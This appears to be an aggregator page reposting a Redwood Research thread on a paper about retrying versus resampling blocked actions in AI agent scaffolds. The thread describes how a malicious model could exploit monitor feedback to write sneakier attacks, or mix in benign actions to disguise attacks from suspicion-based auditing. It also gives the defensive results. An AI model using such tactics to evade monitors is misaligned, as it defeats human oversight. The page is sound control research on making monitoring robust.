/Tech26d ago

James Lucassen and Adam Kaufman find that retrying blocked actions leaks context in AI agent scaffolds, letting malicious models evade audits

Switching to resampling increased safety from 61% to 71%.

3657236.1K

#1573

Original post

Buck Shlegeris#1573

Redwood Research@redwood_ai

Some coding scaffolds block and retry risky actions. In a new paper, we find this reveals information a malicious AI can use to bypass monitoring. Resampling without blocked actions in context is less exploitable, but techniques that help in one setting can hurt in another. 🧵

10:52 AM · May 29, 2026 · 3.3K Views

Sentiment

Sentiment building, check back later.

Cluster Engagement

Digg Deeper

No Digg Deeper questions have been answered for this story yet.

Posts from X

Most Activity

Redwood Research@redwood_ai

Paper: http://arxiv.org/abs/2605.26047 Blog post: http://blog.redwoodresearch.org/p/retrying-vs-resampling-in-ai-control Authors: @jzlucassen, @eccentric1ty

26d37

RETWEETS1

Buck Shlegeris@bshlgrs

James and Adam study control techniques for AI agents like Claude Code's auto mode, where the policy is asked to generate replacement actions when an action is flagged as dangerous.

Main results: these techniques can cheaply improve safety, but some variants are exploitable.

Redwood Research@redwood_ai

26d2.8K3711

REPLIES1

Redwood Research@redwood_ai

In fact, in our new setting using the minimum suspicion dramatically lowers safety as you resample more. While most of the dynamics line up with the findings from Ctrl-Z, naively applying the best techniques from Ctrl-Z to our new setting would massively decrease safety.

26d23

Redwood Research@redwood_ai

Coding scaffolds like Claude Code auto mode and Codex Auto-review tell the model why the monitor thought blocked actions were risky. If the model is honestly trying to do the task, this feedback will help it address the monitor’s concerns and avoid costly mistakes.

26d17

Redwood Research@redwood_ai

We study techniques like this from an AI control perspective, where we try to measure how robust safety techniques are to intentional subversion by a malicious AI. We have three main results.

26d13

Redwood Research@redwood_ai

Firstly, we find that providing monitor reasoning lets an untrusted model write sneakier attacks, erasing safety gains.

26d12

Redwood Research@redwood_ai

Secondly, we found that resampling techniques, which draw multiple samples from the same context, increase safety with zero usefulness cost and without huge increases in inference cost. Unlike retrying, resampling doesn’t reveal information an attacker can exploit.

26d6

Redwood Research@redwood_ai

Retrying without showing monitor reasoning still lets the untrusted model know that its previous action was suspicious, but doesn’t explain why. This isn’t exploitable in the same way, but we think attack selection strategies might still defeat it, which we leave to future work.

26d6

Redwood Research@redwood_ai

This gives the red team a great opportunity: mix in a small fraction of benign actions. This will tank the minimum suspicion, disguising attacks. The blue team can defend against this by executing the least suspicious action, preventing attacks from getting executed.

26d4

Redwood Research@redwood_ai

But in our new setting, the best way to make auditing decisions is to take the maximum suspicion over samples, not the minimum. Inconsistent attacking is no longer a good red team strategy, and executing the least suspicious sample is unnecessary!

26d4

Redwood Research@redwood_ai

Thirdly, we find resampling behaves very differently than in Ctrl-Z. Many dynamics from Ctrl-Z hold up, but one difference changes the equilibrium: executing the least suspicious sample was crucial for the blue team in Ctrl-Z, but we find it isn’t needed in our new setting.

26d4

Redwood Research@redwood_ai

This is because in Ctrl-Z, the best way to make auditing decisions was to take the minimum suspicion over samples. That way when honest false positives returned to normal behavior they’d get a low min score, while attacks would continue to be suspicious and get a high min score.

26d4

Redwood Research@redwood_ai

Naive resampling multiplies inference costs. We can save inference by resampling only suspicious steps, at the cost of some latency. Drawing 4 extra samples per step increases safety by 10.2pp, but +6.2pp can be recovered with only 0.4 extra samples per step.

26d4

Redwood Research@redwood_ai

Retrying and resampling will likely stick around in coding scaffolds. But to provide protection against a strategic adversary they need careful red teaming. Small differences in protocol or setting can dramatically affect optimal red/blue team choices and equilibrium safety.

26d20